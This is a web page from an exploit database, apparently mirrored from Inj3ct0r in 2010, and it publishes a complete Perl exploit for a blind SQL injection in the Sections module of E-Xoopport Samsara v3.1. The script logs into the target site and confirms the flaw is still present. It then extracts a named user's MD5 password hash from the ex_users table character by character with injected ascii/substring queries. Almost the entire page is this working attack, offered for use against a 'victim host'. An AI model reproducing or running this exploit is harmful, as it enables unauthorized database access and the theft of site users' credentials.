Home / os / win7

[webapps / 0day] - E-Xoopport - Samsara <= v3.1 (Sections

Posted on 14 September 2010

<!DOCTYPE html PUBLIC '-//W3C//DTD XHTML 1.0 Strict//EN' 'http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd'><html xmlns='http://www.w3.org/1999/xhtml'><head><meta http-equiv='Content-Type' content='text/html; charset=utf-8' /><meta http-equiv='Content-Language' content='en' /><title>E-Xoopport - Samsara &lt;= v3.1 (Sections Module) Blind SQL Injection | Inj3ct0r - exploit database : vulnerability : 0day : shellcode</title><meta name='description' content='Exploit category: webapps / 0day | Exploit author: _mRkZ_' /><link rel='shortcut icon' href='/favicon.ico' type='image/x-icon' /><link rel='alternate' type='application/rss+xml' title='Inj3ct0r RSS' href='/rss' /><script type='text/javascript'>var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));</script><script type='text/javascript'>try{var pageTracker = _gat._getTracker("UA-12725838-1");pageTracker._setDomainName("none");pageTracker._setAllowLinker(true);pageTracker._trackPageview();}catch(err){}</script></head><body><pre>==================================================================
E-Xoopport - Samsara &lt;= v3.1 (Sections Module) Blind SQL Injection
==================================================================

#!/usr/bin/perl
# [0-Day] E-Xoopport - Samsara &lt;= v3.1 (Sections Module 2) Remote Blind SQL Injection Exploit
# Author/s: _mRkZ_ &amp; Dante90, WaRWolFz Crew
# Created: 2010.09.12 after 0 days the bug was discovered.
# Web Site: www.warwolfz.org
 
use LWP::UserAgent;
use HTTP::Cookies;
use HTTP::Request::Common;
 
$^O eq &#039;MSWin32&#039; ? system(&#039;cls&#039;) : system(&#039;clear&#039;);
 
print &quot;
E-Xoopport - Samsara &lt;= v3.1 (Sections Module) Remote Blind SQL Injection Exploit
+---------------------------------------------------+
| Script: E-Xoopport                                |
| Affected versions: 3.1                            |
| Bug: Remote Blind SQL Injection (Sections Module) |
| Author/s: _mRkZ_ &amp; Dante90, WaRWolFz Crew         |
| Web Site: www.warwolfz.org                        |
+---------------------------------------------------+
&quot;;
 
if (@ARGV != 4) {
    print &quot;
Usage: perl expolit_name.pl &lt;VictimeHost&gt; &lt;YourNick&gt; &lt;YourPass&gt; &lt;NickToHack&gt;
&quot;;
    exit;
}
 
$host    = $ARGV[0];
$usr     = $ARGV[1];
$pwd     = $ARGV[2];
$anickde = $ARGV[3];
$anick   = &#039;0x&#039;.EncHex($anickde);
 
print &quot;[+] Logging In...
&quot;;
my %postdata = (
    uname =&gt; &quot;$usr&quot;,
    pass =&gt; &quot;$pwd&quot;
);
$ua = LWP::UserAgent-&gt;new;
$ua-&gt;agent(&quot;Mozilla 5.0&quot;);
my $req     = (POST $host, \%postdata);
my $cookies = HTTP::Cookies-&gt;new();
$request    = $ua-&gt;request($req);
$ua-&gt;cookie_jar($cookies);
$content    = $request-&gt;content;
if ($content =~ /&lt;head&gt;&lt;meta http-equiv=&quot;Refresh&quot; content=&quot;0; URL=modules/news/&quot; /&gt;&lt;/head&gt;/i) {
    print &quot;[+] Logged in
&quot;;
} else {
    print &quot;[-] Fatal Error: username/password incorrect?
&quot;;
    exit;
}
 
print &quot;[!] Retriving section id...
&quot;;
$idi = 0;
while ($idi != 11) {
    $idi++;
    $ua = LWP::UserAgent-&gt;new;
    $ua-&gt;agent(&quot;Mozilla 5.0&quot;);
    my $req     = $host.&quot;/modules/sections/index.php?op=listarticles&amp;secid=$idi&quot;;
    $request    = $ua-&gt;get($req);
    $ua-&gt;cookie_jar($cookies);
    $content    = $request-&gt;content;
    if ($content =~ /&lt;center&gt;Ecco i documenti della sezione &lt;b&gt;(.+)&lt;/b&gt;/ig) {
        $secid = $idi;
        last;
    }
}
 
if(!defined $secid) {
    print &quot;[-] Fatal Error: Section id not found!
&quot;;
    exit;
} else {
    print &quot;[+] Section id &#039;$secid&#039; retrieved
&quot;;
}
 
print &quot;[!] Checking path...
&quot;;
$ua = LWP::UserAgent-&gt;new;
$ua-&gt;agent(&quot;Mozilla 5.0&quot;);
my $req     = $host.&quot;/modules/sections/index.php?op=listarticles&amp;secid=$secid&quot;;
$request    = $ua-&gt;get($req);
$ua-&gt;cookie_jar($cookies);
$content    = $request-&gt;content;
if ($content =~ /Ecco i documenti della sezione/i) {
    print &quot;[+] Correct Path
&quot;;
} else {
    print &quot;[-] Fatal Error: Wrong Path
&quot;;
    exit;
}
 
print &quot;[!] Checking if vulnerability has been fixed...
&quot;;
$ua = LWP::UserAgent-&gt;new;
$ua-&gt;agent(&quot;Mozilla 5.0&quot;);
my $req     = $host.&quot;/modules/sections/index.php?op=listarticles&amp;secid=$secid+AND+1=1&quot;;
$request    = $ua-&gt;get($req);
$ua-&gt;cookie_jar($cookies);
$content    = $request-&gt;content;
if ($content =~ /&lt;center&gt;Ecco i documenti della sezione &lt;b&gt;(.+)&lt;/b&gt;/ig) {
    print &quot;[+] Vulnerability has not been fixed...
&quot;;
} else {
    print &quot;[-] Fatal Error: Vulnerability has been fixed
&quot;;
    open LOGG, &quot;&gt;log.html&quot;;
    print LOGG $content;
    close LOGG;
    exit;
}
 
print &quot;[!] Checking nick to hack...
&quot;;
$ua = LWP::UserAgent-&gt;new;
$ua-&gt;agent(&quot;Mozilla 5.0&quot;);
my $req     = $host.&quot;/modules/sections/index.php?op=listarticles&amp;secid=$secid+AND+ascii(substring((SELECT+pass+FROM+ex_users+WHERE+uname=$anick+LIMIT+0,1),32,1))&gt;0&quot;;
$request    = $ua-&gt;get($req);
$ua-&gt;cookie_jar($cookies);
$content    = $request-&gt;content;
if ($content =~ /&lt;center&gt;Ecco i documenti della sezione &lt;b&gt;(.+)&lt;/b&gt;/ig) {
    print &quot;[+] Nick exists...
&quot;;
} else {
    print &quot;[-] Fatal Error: Nick does not exists
&quot;;
    exit;
}
 
print &quot;[!] Exploiting...
&quot;;
my $i = 1;
while ($i != 33) {
    my $wn  = 47;
    while (1) {
        $wn++;
        $ua = LWP::UserAgent-&gt;new;
        $ua-&gt;agent(&quot;Mozilla 5.0&quot;);
        my $req     = $host.&quot;/modules/sections/index.php?op=listarticles&amp;secid=$secid+AND+ascii(substring((SELECT+pass+FROM+ex_users+WHERE+uname=$anick+LIMIT+0,1),$i,1))=$wn&quot;;
        $request    = $ua-&gt;get($req);
        $ua-&gt;cookie_jar($cookies);
        $content    = $request-&gt;content;
        if ($content =~ /&lt;center&gt;Ecco i documenti della sezione &lt;b&gt;(.+)&lt;/b&gt;/ig) {
            $pwdchr .= chr($wn);
            $^O eq &#039;MSWin32&#039; ? system(&#039;cls&#039;) : system(&#039;clear&#039;);
            PrintChars($anickde, $pwdchr, $secid);
            last;
        }
    }
    $i++;
}
 
print &quot;
[+] Exploiting completed!

&quot;;
print &quot;Visit: www.warwolfz.net

&quot;;
 
sub PrintChars {
$anick1 = $_[0];
$chars = $_[1];
$secid = $_[2];
print &quot;
E-Xoopport - Samsara &lt;= v3.1 (Sections Module) Remote Blind SQL Injection Exploit
+---------------------------------------------------+
| Script: E-Xoopport                                |
| Affected versions: 3.1                            |
| Bug: Remote Blind SQL Injection (Sections Module) |
| Author/s: _mRkZ_ &amp; Dante90, WaRWolFz Crew         |
| Web Site: www.warwolfz.org                        |
+---------------------------------------------------+
[+] Logging In...
[+] Logged in
[!] Retriving section id...
[+] Section id &#039;$secid&#039; retrived
[!] Checking path...
[+] Correct Path
[!] Checking if vulnerability has been fixed...
[+] Vulnerability has not been fixed...
[!] Checking nick to hack...
[+] Nick exists...
[!] Exploiting...
[+] &quot;.$anick1.&quot;&#039;s md5 Password: $chars
&quot;;
}
 
sub EncHex {
    $char = $_[0];
    chomp $char;
    @trans = unpack(&quot;H*&quot;, &quot;$char&quot;);
    return $trans[0];
}


# <a href='http://inj3ct0r.com/'>Inj3ct0r.com</a> [2010-09-14]</pre></body></html>

 

TOP

Malware :

Exploits :